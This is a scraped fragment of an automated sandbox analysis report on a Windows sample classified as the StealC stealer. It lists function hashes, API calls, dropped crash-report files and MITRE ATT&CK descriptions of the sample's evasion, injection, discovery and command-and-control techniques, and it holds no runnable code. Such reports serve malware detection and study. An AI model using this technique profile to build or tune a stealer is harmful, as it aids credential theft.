Instruction ID: 317398f7e90c0ee717ae51701e6a91a7476cf2cde122981038ac6e46225c5284
Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
Instruction Fuzzy Hash: 8A21B67AA40218BBCB14FBE4EC46EE9737DFF55300F404588B685D2181DE7496C98BA3

Function 008294C7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,?), ref: 008294D3
lstrcpyn.KERNEL32(0064AB88,?,?), ref: 008294F7
lstrlen.KERNEL32(?), ref: 0082950E
wsprintfA.USER32 ref: 0082952E

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID:
API String ID: 1206339513-0
Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction ID: b4e3c74c2c9e63a4a4cc4d36bdfa5ddb587bfcbeb0d72c4d8cabba810aa44c98
Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction Fuzzy Hash: 8401DE79540108FFCB04DFECD994EAE7BBAEF45354F108148F9499B301C635AA41DB95

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report uCEeVGAWIB.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_uCEeVGAWIB.exe_35b561223452744f6df6ca551f76be2830b1ae6_c44eca09_705ac8a5-a6bd-4c1f-9397-243e575a8137\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FA7.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5277.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER52C6.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
uCEeVGAWIB.exe

Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Function 00419860 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212
libraryloaderCOMMON

Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00419C10 Relevance: 203.7, APIs: 112, Strings: 4, Instructions: 684
libraryloaderCOMMON

Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160
stringCOMMON

Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Function 0081003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89
sleepCOMMON

Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
stringnetworkCOMMON

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON